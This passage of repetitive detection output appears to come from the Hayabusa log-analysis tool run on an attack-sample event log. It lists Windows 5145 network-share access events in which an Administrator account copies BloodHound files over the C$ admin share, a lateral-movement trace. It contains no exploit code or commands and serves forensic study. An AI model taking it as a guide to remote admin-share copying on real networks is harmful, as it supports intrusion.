Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP 
Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 